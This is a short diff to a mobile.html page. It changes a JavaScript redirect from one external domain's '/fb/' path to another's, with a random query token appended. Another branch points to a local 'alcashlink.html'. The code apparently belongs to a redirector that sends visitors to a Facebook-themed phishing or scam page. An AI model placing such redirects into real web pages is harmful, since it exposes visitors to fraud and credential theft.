--- a/mobile.html
+++ b/mobile.html
@@ -14,7 +14,7 @@ h.length)); return t };
          window.location = "./alcashlink.html?"+ h(7, '')+"";
         }else
 {
-window.location = "https://educationhubs.xyz/fb/?"+ h(7, '')+"";
+window.location = "wordwj.com/fb/?"+ h(7, '')+"";
 }
 //]]>
 </script>
